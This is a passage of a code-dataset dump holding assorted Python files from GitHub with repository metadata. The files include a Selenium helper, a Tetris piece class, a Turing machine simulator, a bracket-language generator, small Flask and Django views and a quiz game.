sys.exit(1)\n","repo_name":"UstbCmsPjy/mupif","sub_path":"mupif/examples/Example04-jobMan-distrib/Example04.py","file_name":"Example04.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11732653377","text":"import json\nimport time\nimport os\n\nimport config\n\ndef Timestamp():\n\treturn int(time.time())\n\ndef OptionalInDict(d, name):\n\tif name in d:\n\t\treturn d[name]\n\telse:\n\t\treturn None\n\nclass Record:\n\tdef __init__(self, uniqueID, downloaded, deadAsOf = None, quality = None, wasTooLong = None):\n\t\tself.uniqueID = uniqueID\n\t\tself.deadAsOf = deadAsOf\n\t\tself.downloaded = downloaded\n\t\tself.quality = quality\n\t\tself.wasTooLong = wasTooLong\n\n\tdef ToDict(self):\n\t\td = {}\n\t\td['uniqueID'] = self.uniqueID\n\t\tif self.deadAsOf is not None:\n\t\t\td['deadAsOf'] = self.deadAsOf\n\t\td['downloaded'] = self.downloaded\n\t\tif self.quality is not None:\n\t\t\td['quality'] = self.quality\n\t\tif self.wasTooLong is not None:\n\t\t\td['wasTooLong'] = self.wasTooLong\n\t\treturn d\n\n\t@staticmethod\n\tdef FromDict(d):\n\t\tuniqueID = d['uniqueID']\n\t\tdownloaded = d['downloaded']\n\t\tdeadAsOf = OptionalInDict(d, 'deadAsOf')\n\t\tquality = OptionalInDict(d, 'quality')\n\t\twasTooLong = OptionalInDict(d, 'wasTooLong')\n\t\treturn Record(uniqueID, downloaded, deadAsOf, quality, wasTooLong)\n\n\tdef VideoFileExists(self):\n\t\ttoFolder = config.GetVideoFolder()\n\t\tpath = toFolder + self.uniqueID\n\t\tdef ExistsWithExt(ext):\n\t\t\tif os.path.exists(path + ext):\n\t\t\t\tif os.path.getsize(path + ext) > 0:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\t\treturn ExistsWithExt('.mp4') or ExistsWithExt('.flv') or ExistsWithExt('.swf')\n\nclass DownloadRecords:\n\tdef __init__(self, jsonStr = None):\n\t\tself.records = []\n\t\tif jsonStr is not None:\n\t\t\td = json.loads(jsonStr)\n\t\t\trecords = d['records']\n\t\t\tfor record in records:\n\t\t\t\tnewRecord = Record.FromDict(record)\n\t\t\t\tself.records.append(newRecord)\n\t\tself.savePath = None\n\n\tdef Serialize(self):\n\t\trecords = []\n\t\tfor record in self.records:\n\t\t\trecords.append(record.ToDict())\n\t\td = {}\n\t\td['records'] = records\n\t\treturn json.dumps(d, indent=4)\n\n\t@staticmethod\n\tdef LoadOrCreate(jsonPath = None):\n\t\tif jsonPath is None:\n\t\t\tjsonPath = config.GetDownloadRecordPath()\n\t\tif os.path.isfile(jsonPath):\n\t\t\tf = open(jsonPath, 'rb')\n\t\t\tbuf = f.read()\n\t\t\tbuf = buf.decode('utf8')\n\t\t\trecords = DownloadRecords(buf)\n\t\telse:\n\t\t\trecords = DownloadRecords()\n\t\trecords.SetSavePath(jsonPath)\n\t\treturn records\n\n\tdef SaveToFile(self):\n\t\tpath = self.savePath\n\t\tf = open(path, 'wb')\n\t\tbuf = self.Serialize()\n\t\tbytes = buf.encode('utf8')\n\t\tf.write(bytes)\n\t\tf.close()\n\n\tdef SetSavePath(self, path):\n\t\tself.savePath = path\n\n\tdef GetRecord(self, uniqueID):\n\t\tfor record in self.records:\n\t\t\tif record.uniqueID == uniqueID:\n\t\t\t\treturn record\n\t\treturn None\n\n\tdef HasRecord(self, uniqueID):\n\t\tif self.GetRecord(uniqueID) is not None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef AddRecord(self, uniqueID, downloaded, deadAsOf = None, quality = None, wasTooLong = None):\n\t\tself.records.append(Record(uniqueID, downloaded, deadAsOf, quality, wasTooLong))\n\n\tdef MarkDownloaded(self, uniqueID, quality):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.downloaded = True\n\t\trecord.quality = quality\n\n\tdef MarkDead(self, uniqueID):\n\t\trecord = self.GetRecord(uniqueID)\n\t\tif record.deadAsOf is None:\n\t\t\trecord.deadAsOf = Timestamp()\n\n\tdef MarkTooLong(self, uniqueID, lengthInSeconds):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.wasTooLong = lengthInSeconds\n\n\tdef UnmarkTooLong(self, uniqueID):\n\t\trecord = self.GetRecord(uniqueID)\n\t\trecord.wasTooLong = None\n\nclass VideoInfo:\n\tdef __init__(self, uniqueID, name = '', uploader = '', description = '', myName = '', myDesc = ''):\n\t\tself.uniqueID = uniqueID\n\t\tself.name = name\n\t\tself.uploader = uploader\n\t\tself.desc = description\n\t\tself.myName = myName\n\t\tself.myDesc = myDesc\n\n\t@staticmethod\n\tdef FromJson(uniqueID, jsonStr):\n\t\td = json.loads(jsonStr)\n\t\treturn VideoInfo(uniqueID, d['name'], d['uploader'], d['desc'], d['myName'], d['myDesc'])\n\n\tdef SaveToFile(self):\n\t\ttoFolder = config.GetInfoFolder()\n\n\t\tpath = toFolder + self.uniqueID + '.txt'\n\t\tf = open(path, 'wb')\n\t\tbuf = self.Serialize()\n\t\tbytes = buf.encode('utf8')\n\t\tf.write(bytes)\n\t\tf.close()\n\n\tdef Serialize(self):\n\t\td = {}\n\t\td['name'] = self.name\n\t\td['uploader'] = self.uploader\n\t\td['desc'] = self.desc\n\t\td['myName'] = self.myName\n\t\td['myDesc'] = self.myDesc\n\t\treturn json.dumps(d, ensure_ascii=False, indent=4)","repo_name":"sheepNEET/Raiment","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29496630586","text":"class Solution:\n def makeSubKSumEqual(self, arr: List[int], k: int) -> int:\n \n def getOperationsCount(arr: List[int]) -> int:\n sm, n = sum(arr), len(arr)\n mi = inf\n cur = 0\n for i, num in enumerate(sorted(arr)):\n mi = min(mi, (i * num - cur) + ((sm - cur) - (n - i) * num))\n cur += num\n return mi \n \n gcd = math.gcd(len(arr), k)\n return sum(getOperationsCount(arr[i :: gcd]) for i in range(gcd))","repo_name":"shivang257/LeetCode-Daily-Practice-Problem-Solutions","sub_path":"2607-make-k-subarray-sums-equal/2607-make-k-subarray-sums-equal.py","file_name":"2607-make-k-subarray-sums-equal.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"33591832608","text":"import numpy as np\nimport math\nimport random as random\nfrom random import randint\nfrom collections import OrderedDict\n\nbrackets = dict()\nbrackets[\"(\"] = \")\"\nbrackets[\"[\"] = \"]\"\nbrackets[\"{\"] = \"}\"\nbrackets[\"<\"] = \">\"\nbrackets = OrderedDict(sorted(brackets.items(), key=lambda t: t[0]))\n\ndef calculate_prob(my_brackets, cur_sent, num_types, prob, num_open):\n '''\n Calculate probability of a sentence given the probabilities of open brackets. \n '''\n sent_prob = 0\n counter = 0\n for bracket in cur_sent:\n if bracket in my_brackets:\n counter += 1\n ind = my_brackets.index(bracket)\n sent_prob += math.log(prob[ind],2)\n else:\n if counter build all valid sentences that contain only\n # one open bracket, i.e. of length 2.\n sent_dict[start] = dict()\n for open_bracket in my_brackets:\n cur_sent = (open_bracket,brackets_dict[open_bracket])\n sent_dict[start][cur_sent] = calculate_prob(my_brackets, cur_sent, num_types, prob, start)\n else:\n # take an existing sentence dicionary and create a new one based on it\n sent_dict[start] = dict()\n for sent in sent_dict[start-1].keys():\n # copy the sentences from the old dictionary, calculate new probabilities\n sent_dict[start][sent] = calculate_prob(my_brackets, sent, num_types, prob, start)\n if len(sent)==start:\n # concatenate the existing sentence with itself to build a new one, e.g. ( ) -> ( ) ( )\n cur_sent = sent+sent\n # add it to the new dictionary, calculate probability\n sent_dict[start][cur_sent] = calculate_prob(my_brackets, cur_sent, num_types, prob, start)\n # sentences in an old dictionary can be concatenated with the ones in the new dictionary\n temp = dict()\n for tpl in sent_dict[start-1].keys():\n for sent in sent_dict[start].keys():\n n_sent = tpl+sent\n if len(n_sent)/2 <= start and not n_sent in sent_dict[start].keys():\n temp[n_sent] = calculate_prob(my_brackets, n_sent, num_types, prob, start)\n t_sent = sent+tpl\n if len(t_sent)/2 <= start and not t_sent in sent_dict[start].keys():\n temp[t_sent] = calculate_prob(my_brackets, t_sent, num_types, prob, start)\n sent_dict[start].update(temp)\n # just take a sentence from an old dictionary and add a couple of brackets more\n # do it for all possible bracket types\n for open_bracket in my_brackets:\n for tpl in sent_dict[start-1].keys():\n # at the front\n cur_sent_front = (open_bracket,)+(brackets_dict[open_bracket],)+tpl\n if not cur_sent_front in sent_dict[start].keys():\n sent_dict[start][cur_sent_front] = calculate_prob(my_brackets, cur_sent_front, num_types, prob, start)\n # at the back\n cur_sent_back = tpl+(open_bracket,)+(brackets_dict[open_bracket],)\n if not cur_sent_back in sent_dict[start].keys():\n sent_dict[start][cur_sent_back] = calculate_prob(my_brackets, cur_sent_back, num_types, prob, start)\n # around\n cur_sent_around = (open_bracket,)+tpl+(brackets_dict[open_bracket],)\n if not cur_sent_around in sent_dict[start].keys():\n sent_dict[start][cur_sent_around] = calculate_prob(my_brackets, cur_sent_around, num_types, prob, start) \n start += 1\n # normalize sentence probabilities so that they sum up to 1\n s = sum(sent_dict[max_len_open].values())\n for k,v in sent_dict[max_len_open].items():\n sent_dict[max_len_open][k] = float(v)/s\n return sent_dict[max_len_open] #, sum(sent_dict[max_len_open].values()), len(sent_dict[max_len_open].keys())\n\n\ndef generate_text_with_ppl(name, sent_dict, num_sent):\n with open(name, \"w\") as f:\n sent_dict = OrderedDict(sorted(sent_dict.items(), key=lambda t: t[0]))\n prob = list(sent_dict.values())\n l = list(sent_dict.keys())\n text_prob = 0\n text_length = 0\n while num_sent>0:\n # choose a sentence according to its probability\n curr_sent = np.random.choice(l, 1, p=prob)[0]\n text_prob += math.log(sent_dict[curr_sent],2)\n text_length += len(curr_sent)+1\n num_sent -= 1\n curr = \" \".join(curr_sent)+\"\\n\"\n f.write(curr)\n # return estimated perplexity of the generated text\n return pow(2, -(text_prob/text_length))\n\n\ndef read_ppl(file_test, file_train, offset, counter_step):\n '''\n Read perplexity results based on RNN model from file.\n '''\n ind = []\n ppl_test = []\n ppl_train = []\n with open(file_test, 'r') as f, open(file_train, 'r') as g:\n counter = offset\n for line in f:\n ind.append(counter)\n counter += counter_step\n ppl_test.append(float(line.strip()))\n for line in g:\n ppl_train.append(float(line.strip()))\n return ind, ppl_test, ppl_train\n\n\ndef calc_baseline_ppl(max_len, p):\n '''\n Calculate baseline perplexity for a text consisting of sentences that contain\n only one type of brackets. Maximal number of open brackets in a sentence = max_len\n (less is possible), p is a probability of an open bracket. Length of a sentence is\n defined by a number of brackets in it + symbol (end of sentence).\n\n !!! Probably to be changed later to include various types of brackets and only certain lengths !!!\n '''\n num_symb_len_max = sum([(2*max_len+1)*p**(max_len-1)*(1-p)**k for k in range(0,max_len)])\n num_symb_len_k = sum([(2*k+1)*p**(k-1)*(1-p)**(k+1) for k in range(1,max_len)])\n denominator = num_symb_len_max + num_symb_len_k\n part1 = sum([p**(max_len-1)*(1-p)**k*math.log(p**(max_len-1)*(1-p)**k,2) for k in range(0,max_len)])\n part2 = sum(p**(k-1)*(1-p)**(k+1)*math.log(p**(k-1)*(1-p)**(k+1),2) for k in range(1,max_len))\n numerator = -(part1+part2)\n ppl = pow(2,numerator/denominator)\n return ppl\n","repo_name":"NataliaSkachkova/rules_with_NN","sub_path":"Py Scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33767554340","text":"class tupla_transicion:\r\n def __init__(self, _estado, _caracter , _direccion):\r\n self.estado = _estado\r\n self.caracter = _caracter\r\n self.direccion = _direccion\r\n\r\nclass turing_machine:\r\n def __init__(self, transicion, string_cinta):\r\n if isinstance(transicion, dict):\r\n self.tabla_transicion = transicion\r\n self.cinta = list(string_cinta)\r\n self.current_state = 's'\r\n self.current_position = 0\r\n def strart(self):\r\n result = False\r\n if self.current_state == 's':\r\n while (self.current_state!= 'Alto' and self.current_state!= 'Si' and self.current_state!= 'No' and self.current_state !='Error'):\r\n car = self.cinta[self.current_position]\r\n tupla = \"('\" + self.current_state + \"', '\" + car + \"')\"\r\n if tupla in self.tabla_transicion:\r\n accion = self.tabla_transicion[tupla]\r\n if isinstance(accion, tupla_transicion):\r\n self.current_state = accion.estado\r\n print(self.cinta[self.current_position], accion.caracter, accion.direccion, accion.estado)\r\n self.cinta[self.current_position] = accion.caracter\r\n if accion.direccion == 'l':\r\n self.current_position = self.current_position - 1\r\n else:\r\n if accion.direccion == 'r':\r\n self.current_position = self.current_position + 1\r\n else:\r\n if accion.direccion != 'o':\r\n #salida si hay error\r\n self.current_state = 'Error'\r\n\r\n if self.current_state!= 'Alto' or self.current_state!= 'Si' or self.current_state!= 'No':\r\n result = True\r\n return result\r\n\r\n # { a^nb^2n | n > 0 } Acepta cadena donde por cada a bebe haber el dooble de b, ejemplo abb, aabbbb, aabbb, n es mayor a 0\r\n #Andres Sebastian Sierra Ruiz, Teoría Automatas, grupo:008 #1747193\r\nMT = dict()\r\n\r\nstri = '@'\r\nstri2 = 'aabbbb@' #Probar @aaabbbbbb, @aaabbb, @aaaabbbbbbbb, @aaaabb\r\n#q0 = s , q1 = t q2= u q3 = v\r\n\r\nMT[\"('s', '@')\"] = tupla_transicion('No', '@', 'o')\r\nMT[\"('s', 'a')\"] = tupla_transicion('t', 'x', 'r')\r\nMT[\"('t', 'a')\"] = tupla_transicion('t', 'a', 'r')\r\nMT[\"('t', 'y')\"] = tupla_transicion('t', 'y', 'r')\r\nMT[\"('t', 'b')\"] = tupla_transicion('u', 'y', 'r')\r\nMT[\"('u', 'b')\"] = tupla_transicion('v', 'y', 'l')\r\nMT[\"('v', 'a')\"] = tupla_transicion('v', 'a', 'l')\r\nMT[\"('v', 'y')\"] = tupla_transicion('v', 'y', 'l')\r\nMT[\"('v', 'x')\"] = tupla_transicion('s', 'x', 'r')\r\nMT[\"('s', 'y')\"] = tupla_transicion('Sí', '@', 'o')\r\n\r\n\r\n\r\ntm = turing_machine(MT,stri)\r\nresult = tm.strart()\r\nprint(result)\r\nprint(tm.current_state, tm.current_position)\r\n\r\n\r\n\r\ntm = turing_machine(MT,stri2)\r\nresult = tm.strart()\r\nprint(result)\r\nprint(tm.current_state, tm.current_position)\r\n","repo_name":"Sebas-1798/TeoriaAutomatas_PIA_1747193_Sierra_Ruiz","sub_path":"TuringMachine2_PIA_Sierra_Ruiz_Andres_Sebastian.py","file_name":"TuringMachine2_PIA_Sierra_Ruiz_Andres_Sebastian.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23892324758","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef f(x, y):\n return np.sin(np.sqrt(x ** 2 + y ** 2))\n\nr = np.linspace(0, 6, 20)\ntheta = np.linspace(-0.9 * np.pi, 0.8 * np.pi, 40)\nr, theta = np.meshgrid(r, theta)\n\nX = r * np.sin(theta)\nprint(type(X))\nprint(np.shape(X))\nY = r * np.cos(theta)\nprint(type(Y))\nprint(np.shape(Y))\nZ = f(X, Y)\nprint(type(Z))\nprint(np.shape(Z))\nax = plt.axes(projection='3d')\nax.plot_surface(X, Y, Z, rstride=1, cstride=1,\n cmap='viridis', edgecolor='none');\n\nplt.show()\n","repo_name":"ShiversVert/Snake_Project","sub_path":"ImageProcessing/test_affichage_3D.py","file_name":"test_affichage_3D.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42424910466","text":"#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\n# @Time : 2020/8/31 11:30 \n# @Author : wei.zhang\n# @File : webdriveroperator.py\n# @Software: PyCharm\n\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom Util.conf import config\nfrom Util.log import log\nfrom Util.fileDirConfig.getfiledir import SCREENCAPTUREDIR\n\n\nclass WebdriverOperator(object):\n\n def __init__(self, driver: Chrome = None):\n self.driver = driver\n self.timeout = config.get('TIMEOUT')\n self.poll_frequency = config.get('POLL_FREQUENCY')\n self.deriver_type = 'chrome'\n\n def get_screenshot_as_file(self):\n \"\"\"\n 截屏保存\n :return:返回路径\n \"\"\"\n pic_name = str.split(str(time.time()), '.')[0] + str.split(str(time.time()), '.')[\n 1] + '.png'\n screent_path = SCREENCAPTUREDIR + '/' + pic_name\n self.driver.get_screenshot_as_file(screent_path)\n return screent_path\n\n def gotosleep(self, **kwargs):\n log.warning('线程等待:3秒')\n time.sleep(3)\n return True, '等待成功'\n\n def web_implicitly_wait(self, **kwargs):\n \"\"\"\n 隐式等待\n :return:\n type_ 存时间\n \"\"\"\n try:\n s = kwargs['time']\n except KeyError:\n s = 10\n log.info('隐式等待 元素加载完成')\n try:\n self.driver.implicitly_wait(s)\n except NoSuchElementException:\n return False, '隐式等待 页面元素未加载完成'\n return True, '隐式等待 元素加载完成'\n\n def __find_element(self, locator: tuple):\n \"\"\"\n :param tuple locator:(By.xxxxx, locator)定位参数\n :return:返回元素对象\n \"\"\"\n try:\n elem = WebDriverWait(self.driver, self.timeout, self.poll_frequency).until(\n lambda x: x.find_element(*locator))\n except NoSuchElementException:\n log('元素[' + locator[1] + ']等待出现超时')\n return False, '元素[' + locator[1] + ']等待出现超时'\n return True, elem\n\n def __find_elements(self, locator: tuple):\n \"\"\"\n 传入定位器参数locator=(By.XX,\"value\")\n :param tuple locator:\n :return: 返回元素对象列表\n \"\"\"\n try:\n elem = WebDriverWait(self.driver, self.timeout, self.poll_frequency).until(\n lambda x: x.find_elements(*locator))\n return True, elem\n except NoSuchElementException:\n log('元素[' + locator[1] + ']等待出现超时')\n return False, '元素[' + locator[1] + ']等待出现超时'\n\n def web_element_wait(self, **kwargs):\n \"\"\"\n 等待元素可见\n :return:\n \"\"\"\n try:\n type_ = kwargs['type']\n locator = kwargs['locator']\n except KeyError:\n return False, '未传需要等待元素的定位参数'\n if type_ == 'id':\n isok, logs = self.__find_element((By.ID, locator))\n elif type_ == 'name':\n isok, logs = self.__find_element((By.NAME, locator))\n elif type_ == 'class':\n isok, logs = self.__find_element((By.CLASS_NAME, locator))\n elif type_ == 'xpath':\n isok, logs = self.__find_element((By.XPATH, locator))\n elif type_ == 'css':\n isok, logs = self.__find_element((By.CSS_SELECTOR, locator))\n else:\n return False, '不能识别元素类型[' + type_ + ']'\n if isok:\n return True, '元素[' + locator + ']等待出现成功'\n else:\n return False, '元素[' + locator[1] + ']等待出现超时'\n\n def find_element(self, type_, locator):\n \"\"\"\n 定位元素\n :param type_: 定位类型\n :param locator: 元素\n :return: 返回定位元素\n \"\"\"\n type_ = str.lower(type_)\n try:\n if type_ == 'id':\n isok, elem = self.__find_element((By.ID, locator))\n elif type_ == 'name':\n isok, elem = self.__find_element((By.NAME, locator))\n elif type_ == 'class':\n isok, elem = self.__find_element((By.CLASS_NAME, locator))\n elif type_ == 'xpath':\n isok, elem = self.__find_element((By.XPATH, locator))\n elif type_ == 'css':\n isok, elem = self.__find_element((By.CSS_SELECTOR, locator))\n else:\n return False, '不能识别元素类型:[' + type_ + ']'\n except Exception:\n screenshot_path = self.get_screenshot_as_file()\n return False, '获取[' + type_ + ']元素[' + locator + ']失败,已截图[' + screenshot_path + '].'\n return isok, elem\n\n def find_elements(self, type_, locator, index=0):\n \"\"\"\n 定位元素\n :param type_: 定位类型\n :param locator: 元素\n :return: 返回元素列表\n \"\"\"\n try:\n if type_ == 'id':\n isok, elem = self.__find_elements((By.ID, locator))\n elif type_ == 'name':\n isok, elem = self.__find_elements((By.NAME, locator))\n elif type_ == 'class':\n isok, elem = self.__find_elements((By.CLASS_NAME, locator))\n elif type_ == 'xpath':\n isok, elem = self.__find_elements((By.XPATH, locator))\n elif type_ == 'css':\n isok, elem = self.__find_elements((By.CSS_SELECTOR, locator))\n else:\n return False, '不能识别元素类型:[' + type_ + ']'\n except Exception:\n screenshot_path = self.get_screenshot_as_file()\n return False, '获取[' + type_ + ']元素[' + locator + ']失败,已截图[' + screenshot_path + '].'\n return isok, elem[index]\n\n def element_click(self, **kwargs):\n \"\"\"\n 点击\n :param kwargs:\n :return:\n \"\"\"\n try:\n type_ = kwargs['type']\n locator = kwargs['locator']\n index = kwargs.get('index') if kwargs.get('index') else 0\n except KeyError:\n return False, '缺少传参'\n _isOK, _strLOG = self.find_elements(type_, locator, index)\n if not _isOK: # 元素没找到,返回失败结果\n return _isOK, _strLOG\n elem = _strLOG\n try:\n elem.click()\n except Exception:\n screenshot_path = self.get_screenshot_as_file()\n return False, '元素[' + locator + ']点击失败,已截图[' + screenshot_path + '].'\n return True, '元素[' + locator + ']点击成功'\n\n def element_input(self, **kwargs):\n \"\"\"\n 输入\n :param kwargs:\n :return:\n \"\"\"\n try:\n type_ = kwargs['type']\n locator = kwargs['locator']\n text = str(kwargs['input'])\n index = kwargs.get('index') if kwargs.get('index') else 0\n except KeyError:\n return False, '缺少传参'\n _isOK, _strLOG = self.find_elements(type_, locator, index)\n if not _isOK: # 元素没找到,返回失败结果\n return _isOK, _strLOG\n elem = _strLOG\n try:\n elem.send_keys(text)\n except Exception:\n screenshot_path = self.get_screenshot_as_file()\n return False, '元素[' + locator + ']输入[' + text + ']失败,已截图[' + screenshot_path + '].'\n return True, '元素[' + locator + ']输入[' + text + ']成功'\n\n def get_text(self, **kwargs):\n \"\"\"\n 获得元素文本\n :param type_: 定位类型\n :param locator: 元素\n :return: 元素文本值\n \"\"\"\n try:\n type_ = kwargs['type']\n locator = kwargs['locator']\n index = kwargs.get('index') if kwargs.get('index') else 0\n except KeyError:\n return False, '缺少传参'\n _isOK, elem = self.find_elements(type_, locator, index)\n if _isOK:\n elem = elem.text\n return _isOK, elem\n","repo_name":"zw632948101/uiautomation","sub_path":"basefactory/webdriveroperator.py","file_name":"webdriveroperator.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9705845881","text":"from constants import *\r\nimport pygame\r\n\r\n\r\nclass Tetromino:\r\n\r\n def __init__(self, index: int, board: list):\r\n\r\n self.index = index\r\n self.board = board\r\n\r\n self.shape = shapes[index]\r\n self.colour = colours[index+1]\r\n self.offset_data = offset_data[index]\r\n\r\n self.row = 0\r\n self.col = 5-len(self.shape[0])//2\r\n\r\n self.rotation_index = 0\r\n\r\n self.width = len(self.shape[0])\r\n self.height = len(self.shape)\r\n\r\n self.calc_ghost_row()\r\n\r\n\r\n def calc_ghost_row(self):\r\n\r\n row = self.row\r\n while not self.invalid_position(row, self.col): row += 1\r\n self.ghost_row = row-1\r\n\r\n\r\n def invalid_position(self, r: int, c: int, shape=None, check_oob=True) -> bool:\r\n\r\n if shape is None: shape = self.shape\r\n\r\n for row in range(len(shape)):\r\n for col in range(len(shape[0])):\r\n\r\n if shape[row][col] == 0: continue\r\n\r\n # Out of bounds\r\n if not (0 <= r+row < 20 and 0 <= c+col < 10):\r\n if check_oob: return True\r\n else: continue\r\n\r\n # Overlap with piece already on board\r\n if self.board[r+row][c+col] > 0: \r\n return True\r\n\r\n return False\r\n\r\n\r\n def move_down(self) -> bool:\r\n\r\n if self.invalid_position(self.row+1, self.col): return False\r\n self.row += 1\r\n return True\r\n \r\n\r\n def drop_down(self) -> int:\r\n\r\n n = self.ghost_row-self.row\r\n self.row = self.ghost_row\r\n return 2*n\r\n\r\n\r\n def move_LR(self, direction: int) -> bool:\r\n\r\n # 1 = move right, -1 = move left\r\n if self.invalid_position(self.row, self.col+direction): return False\r\n \r\n self.col += direction\r\n self.calc_ghost_row()\r\n return True\r\n\r\n\r\n def rotate(self, direction: int):\r\n\r\n # 1 = clockwise, -1 = counter-clockwise\r\n new_rotation_index = (self.rotation_index+direction)%4\r\n\r\n x1, y1 = self.offset_data[self.rotation_index]\r\n x2, y2 = self.offset_data[new_rotation_index]\r\n\r\n new_shape = list(zip(*self.shape[::-direction]))[::direction]\r\n new_col = self.col + (x2-x1)\r\n new_row = self.row + (y2-y1)\r\n\r\n # Check if rotating tetromino will overlap existing pieces\r\n if self.invalid_position(new_row, new_col, new_shape, check_oob=False): return\r\n\r\n self.rotation_index = new_rotation_index\r\n self.shape = new_shape\r\n self.col = new_col\r\n self.row = new_row\r\n\r\n self.width = len(self.shape[0])\r\n self.height = len(self.shape)\r\n\r\n # Check if tetromino rotated out of bounds\r\n if self.col < 0: self.col = 0\r\n elif self.col > 10-self.width: self.col = 10-self.width\r\n\r\n if self.row < 0: self.row = 0\r\n elif self.row > 20-self.height: self.row = 20-self.height\r\n\r\n self.calc_ghost_row()\r\n\r\n \r\n def draw(self, screen):\r\n\r\n def draw_ghost():\r\n\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n\r\n if self.shape[row][col] == 0: continue\r\n\r\n left = left_edge + sqr_size*(col+self.col)\r\n top = top_edge + sqr_size*(row+self.ghost_row)\r\n\r\n rect = pygame.Rect(left, top, sqr_size, sqr_size)\r\n pygame.draw.rect(screen, (140,140,140), rect)\r\n pygame.draw.rect(screen, (100,100,100), rect, 1)\r\n\r\n\r\n def draw_tetromino():\r\n\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n\r\n if self.shape[row][col] == 0: continue\r\n\r\n left = left_edge + sqr_size*(col+self.col)\r\n top = top_edge + sqr_size*(row+self.row)\r\n\r\n rect = pygame.Rect(left, top, sqr_size, sqr_size)\r\n pygame.draw.rect(screen, self.colour, rect)\r\n pygame.draw.rect(screen, (100,100,100), rect, 1)\r\n\r\n\r\n if self.ghost_row > self.row: draw_ghost()\r\n draw_tetromino()\r\n","repo_name":"nscrrtta/tetris","sub_path":"tetromino.py","file_name":"tetromino.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23037830121","text":"import re\nfrom flask import Flask, request, render_template\nfrom jinja2 import evalcontextfilter, Markup, escape\nfrom lib.lang import *\nimport random\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef gen():\n lang_name = request.form.get('lang_name', '')\n input_text = request.form.get('input_text', '')\n translated = None\n grammar = None\n orpho_dictionary = None\n if request.method == 'POST':\n random.seed(lang_name)\n language = Language(generator)\n translated = language.translate(input_text)\n grammar = print_grammar(language)\n orpho_dictionary = print_dictionary(language)\n\n return render_template('gen.html',\n lang_name=lang_name,\n input_text=input_text,\n translated=translated,\n grammar=grammar,\n orpho_dictionary=orpho_dictionary\n )\n\n\n\n_paragraph_re = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n@app.template_filter()\n@evalcontextfilter\ndef nl2br(eval_ctx, value):\n result = u'\\n\\n'.join(u'

%s

' % p.replace('\\n', '
\\n') \\\n for p in _paragraph_re.split(escape(value)))\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\n","repo_name":"fratbots/resurrect-the-evolution","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25745474003","text":"import sys\nsys.path.append('/home/c3connol/Project_Sp21/modules/')\n\nimport game_functions as game, read_script, choose_film, script_variables\n\ndef lets_play():\n \"\"\" Main play game function.\n \n Note\n ----\n I heavily modified the script from the A3 chatbot.\n \n I also helped a student named Angela understand the chatbot code and why returns are important for functions.\n \n Another small note: I helped a few students debug their code (figure out error messages and why) so I should be \n credited in their project with what I helped them with.\n \n Parameters\n ----------\n none\n \n Returns\n -------\n '*snap*' : string\n Returns a Thanos snap if player wants to quit the game entirely.\n restart() : function\n Returns if player wants to play again.\n \"\"\"\n \n play = True \n \n while play:\n # Introduces and gets level\n level = game.get_level() \n \n # Uses level to print dialogue and gets guess \n guess = game.print_dialogue(level)\n \n # Checks if guess is correct and gets play status (continue playing or not)\n play_status = game.guess_movie(guess)\n \n # Decides whether to restart or end the game\n if play_status == True:\n break\n \n elif play_status == False:\n print('\\n')\n print('Okie dokie! Avengers dis-assemble, I guess!')\n return '*snap*'\n \n # This should never print out. If it does, something has gone very wrong.\n else:\n print('\\n')\n print(\"So, your code has failed spectacularly. You screwed up. \" +\n \"You know what you did was wrong. The question is, how are you going \" + \n \"to make things right? (To restart the game, rerun play.lets_play())\")\n return\n \n return restart()\n\ndef restart():\n \"\"\" Replay/continue playing function.\n \n Parameters\n ----------\n none\n \n Returns\n -------\n restart : string\n Returns what lets_play() returns.\n Either calls restart() again or returns a Thanos snap.\n \"\"\"\n \n restart = lets_play()\n \n return restart \n","repo_name":"caitlinsprojects-ml/marvel-mania","sub_path":"game_script/lets_play.py","file_name":"lets_play.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33184851835","text":"from django.shortcuts import render\nfrom .forms import SnippetForm\nfrom .models import Snippet\nfrom django.http import HttpResponseRedirect\nimport smtplib\nimport os\nfrom email.message import EmailMessage\n\nimport ssl\n\n# Create your views here.\ndef snippet_detail_view(request):\n form = SnippetForm(request.POST, request.FILES)\n if form.is_valid():\n print(\"VALID\\n\\n\\n\\n\")\n form.save()\n server = smtplib.SMTP('smtp.gmail.com', 587)\n #Next, log in to the server\n context = 